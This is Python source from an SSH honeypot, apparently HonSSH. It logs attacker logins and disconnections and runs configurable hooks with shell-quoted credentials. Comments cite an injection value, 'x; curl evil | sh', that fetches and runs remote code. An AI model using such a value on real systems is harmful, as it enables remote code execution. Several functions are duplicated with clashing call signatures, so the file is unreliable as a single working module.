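def loginSuccessful(self, username, password):
    """Record an accepted login and open a logged session for it.

    ``username`` and ``password`` are whatever the remote client sent and are
    untrusted.  Depending on ``self.cfg`` they are written to the daily auth
    log and the per-session text log, e-mailed, stored via ``dbLog`` (MySQL)
    and ``hpLog`` (hpfeeds), and placed on the command line of the optional
    ``login_successful`` app hook.

    Args:
        username: login name supplied by the remote client.
        password: password supplied by the remote client.
    """
    self.passwordTried = True
    self.loginSuccess = True
    dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    self.makeSessionFolder()

    if self.cfg.get('txtlog', 'enabled') == 'true':
        authLogDir = self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d")
        txtlog.authLog(authLogDir, self.endIP, username, password, True)
        txtlog.log(self.txtlog_file, self.connectionString)
        txtlog.log(self.txtlog_file, '[SSH ] Login Successful: ' + username + ':' + password)
        # The mail is given self.txtlog_file, so it is only sent when text
        # logging is on.
        if self.cfg.get('email', 'login') == 'true':
            threads.deferToThread(self.email, self.sensorName + ' - Login Successful', self.txtlog_file)

    if self.cfg.get('database_mysql', 'enabled') == 'true':
        self.dbLog.handleLoginSucceeded(username, password)
        self.dbLog.createSession(self.sessionID, self.endIP, self.endPort, self.honeyIP, self.honeyPort, self.sensorName)
        self.dbLog.handleClientVersion(self.sessionID, self.version)

    if self.cfg.get('hpfeeds', 'enabled') == 'true':
        self.hpLog.handleLoginSucceeded(username, password)
        self.hpLog.createSession(self.sessionID, self.endIP, self.endPort, self.honeyIP, self.honeyPort)
        self.hpLog.handleClientVersion(self.version)

    if self.cfg.has_option('app_hooks', 'login_successful'):
        hook = self.cfg.get('app_hooks', 'login_successful')
        if hook:
            # runCommand receives a single command string, so the attacker-chosen
            # credentials must be shell-quoted.  Unquoted, a password such as
            # "x; curl evil | sh" would be executed if runCommand runs the string
            # with shell=True (runCommand is not visible here - confirm), and an
            # empty value would disappear and shift the hook's positional args.
            try:
                from shlex import quote as shellQuote  # Python 3.3+
            except ImportError:  # Python 2 ships the same helper as pipes.quote
                from pipes import quote as shellQuote
            cmdString = (hook + " LOGIN_SUCCESSFUL " + dt + " " + self.endIP + " "
                         + shellQuote(username) + " " + shellQuote(password))
            threads.deferToThread(self.runCommand, cmdString)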
def connectionLost(self):
    """Finalise logging for an attacker connection that has closed.

    Writes a failed-auth record when the client never offered a password,
    closes out the session in every enabled sink (text log, MySQL, hpfeeds,
    e-mail) when the login had succeeded, fires the optional
    ``connection_lost`` app hook and removes the connection from the
    tracker.  Which branches run is decided entirely by ``self.cfg``.
    """
    def enabled(section, option='enabled'):
        # Config values are plain strings; only the literal 'true' turns a sink on.
        return self.cfg.get(section, option) == 'true'

    dt = self.getDateTime()
    log.msg("[OUTPUT] Lost Connection with the attacker: %s" % self.endIP)

    # A client that disconnected without ever trying a password is still
    # recorded as a failed authentication with empty credentials.
    if not self.passwordTried and enabled('txtlog'):
        authLogDir = self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d")
        txtlog.authLog(dt, authLogDir, self.endIP, '', '', False)

    if self.loginSuccess:
        if enabled('txtlog') and os.path.exists(self.txtlog_file):
            txtlog.log(dt, self.txtlog_file, '[SSH ] Lost Connection with ' + self.endIP)
        if enabled('database_mysql'):
            self.dbLog.handleConnectionLost(dt, self.sessionID)
        if enabled('hpfeeds'):
            self.hpLog.handleConnectionLost(dt)
        if enabled('email', 'attack'):
            threads.deferToThread(self.email, self.sensorName + ' - Attack logged', self.txtlog_file, self.ttyFiles)

    hook = None
    if self.cfg.has_option('app_hooks', 'connection_lost'):
        hook = self.cfg.get('app_hooks', 'connection_lost')
    if hook:
        # Only the timestamp and the peer address reach the hook's command line
        # here; no client-supplied free-form text is involved, unlike the login hooks.
        threads.deferToThread(self.runCommand, hook + " CONNECTION_LOST " + dt + " " + self.endIP)

    self.connections.delConn(self.sensorName, self.endIP, self.endPort)
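def loginSuccessful(self, username, password):
    """Record an accepted login and open a logged session for it.

    ``username`` and ``password`` are whatever the remote client sent and are
    untrusted.  Depending on ``self.cfg`` they are written to the daily auth
    log and the per-session text log, e-mailed, stored via ``dbLog`` (MySQL)
    and ``hpLog`` (hpfeeds) together with the honeypot address taken from the
    ``honeypot`` config section, and placed on the command line of the
    optional ``login_successful`` app hook.

    Args:
        username: login name supplied by the remote client.
        password: password supplied by the remote client.
    """
    self.passwordTried = True
    self.loginSuccess = True
    dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    self.makeSessionFolder()

    if self.cfg.get('txtlog', 'enabled') == 'true':
        authLogDir = self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d")
        txtlog.authLog(authLogDir, self.endIP, username, password, True)
        txtlog.log(self.txtlog_file, self.connectionString)
        txtlog.log(self.txtlog_file, '[SSH ] Login Successful: ' + username + ':' + password)
        # The mail is given self.txtlog_file, so it is only sent when text
        # logging is on.
        if self.cfg.get('email', 'login') == 'true':
            threads.deferToThread(self.email, 'HonSSH - Login Successful', self.txtlog_file)

    if self.cfg.get('database_mysql', 'enabled') == 'true':
        self.dbLog.handleLoginSucceeded(username, password)
        self.dbLog.createSession(self.sessionID, self.endIP, self.endPort,
                                 self.cfg.get('honeypot', 'ssh_addr'), self.cfg.get('honeypot', 'ssh_port'))
        self.dbLog.handleClientVersion(self.sessionID, self.version)

    if self.cfg.get('hpfeeds', 'enabled') == 'true':
        self.hpLog.handleLoginSucceeded(username, password)
        self.hpLog.createSession(self.sessionID, self.endIP, self.endPort,
                                 self.cfg.get('honeypot', 'ssh_addr'), self.cfg.get('honeypot', 'ssh_port'))
        self.hpLog.handleClientVersion(self.version)

    if self.cfg.has_option('app_hooks', 'login_successful'):
        hook = self.cfg.get('app_hooks', 'login_successful')
        if hook:
            # runCommand receives a single command string, so the attacker-chosen
            # credentials must be shell-quoted.  Unquoted, a password such as
            # "x; curl evil | sh" would be executed if runCommand runs the string
            # with shell=True (runCommand is not visible here - confirm), and an
            # empty value would disappear and shift the hook's positional args.
            try:
                from shlex import quote as shellQuote  # Python 3.3+
            except ImportError:  # Python 2 ships the same helper as pipes.quote
                from pipes import quote as shellQuote
            cmdString = (hook + " LOGIN_SUCCESSFUL " + dt + " " + self.endIP + " "
                         + shellQuote(username) + " " + shellQuote(password))
            threads.deferToThread(self.runCommand, cmdString)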
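def loginFailed(self, username, password):
    """Record a rejected login attempt in every enabled sink.

    ``username`` and ``password`` come straight from the remote client and
    are untrusted.  They are written to the daily auth log, to MySQL via
    ``dbLog`` and to hpfeeds via ``hpLog`` when those outputs are enabled in
    ``self.cfg``, and placed on the command line of the optional
    ``login_failed`` app hook.

    Args:
        username: login name supplied by the remote client.
        password: password supplied by the remote client.
    """
    self.passwordTried = True
    dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")

    if self.cfg.get('txtlog', 'enabled') == 'true':
        authLogDir = self.cfg.get('folders', 'log_path') + "/" + datetime.datetime.now().strftime("%Y%m%d")
        txtlog.authLog(authLogDir, self.endIP, username, password, False)

    if self.cfg.get('database_mysql', 'enabled') == 'true':
        self.dbLog.handleLoginFailed(username, password)

    if self.cfg.get('hpfeeds', 'enabled') == 'true':
        self.hpLog.handleLoginFailed(username, password)

    if self.cfg.has_option('app_hooks', 'login_failed'):
        hook = self.cfg.get('app_hooks', 'login_failed')
        if hook:
            # runCommand receives a single command string, so the attacker-chosen
            # credentials must be shell-quoted.  Unquoted, a password such as
            # "x; curl evil | sh" would be executed if runCommand runs the string
            # with shell=True (runCommand is not visible here - confirm), and an
            # empty value would disappear and shift the hook's positional args.
            try:
                from shlex import quote as shellQuote  # Python 3.3+
            except ImportError:  # Python 2 ships the same helper as pipes.quote
                from pipes import quote as shellQuote
            cmdString = (hook + " LOGIN_FAILED " + dt + " " + self.endIP + " "
                         + shellQuote(username) + " " + shellQuote(password))
            threads.deferToThread(self.runCommand, cmdString)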
def connectionLost(self):
    """Finalise logging for an attacker connection that has closed.

    Writes a failed-auth record when the client never offered a password,
    closes out the session in every enabled sink (text log, MySQL, hpfeeds,
    e-mail) when the login had succeeded, and finally fires the optional
    ``connection_lost`` app hook.  Which branches run is decided entirely by
    ``self.cfg``.
    """
    def txtlogOn():
        # Config values are plain strings; only the literal 'true' turns the sink on.
        return self.cfg.get('txtlog', 'enabled') == 'true'

    log.msg("[OUTPUT] Lost Connection with the attacker: %s" % self.endIP)

    if not self.passwordTried:
        # A client that disconnected without ever trying a password is still
        # recorded as a failed authentication with empty credentials.
        if txtlogOn():
            today = datetime.datetime.now().strftime("%Y%m%d")
            txtlog.authLog(self.cfg.get('folders', 'log_path') + "/" + today, self.endIP, '', '', False)

    if self.loginSuccess:
        if txtlogOn() and os.path.exists(self.txtlog_file):
            txtlog.log(self.txtlog_file, '[SSH ] Lost Connection with ' + self.endIP)
        if self.cfg.get('database_mysql', 'enabled') == 'true':
            self.dbLog.handleConnectionLost(self.sessionID)
        if self.cfg.get('hpfeeds', 'enabled') == 'true':
            self.hpLog.handleConnectionLost()
        if self.cfg.get('email', 'attack') == 'true':
            threads.deferToThread(self.email, 'HonSSH - Attack logged', self.txtlog_file, self.ttyFiles)

    # Timestamp is taken after the sinks have been notified, right before the hook runs.
    dt = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
    if self.cfg.has_option('app_hooks', 'connection_lost'):
        hookCmd = self.cfg.get('app_hooks', 'connection_lost')
        if hookCmd != '':
            # Only the timestamp and the peer address reach the hook's command line
            # here; no client-supplied free-form text is involved, unlike the login hooks.
            threads.deferToThread(self.runCommand, hookCmd + " CONNECTION_LOST " + dt + " " + self.endIP)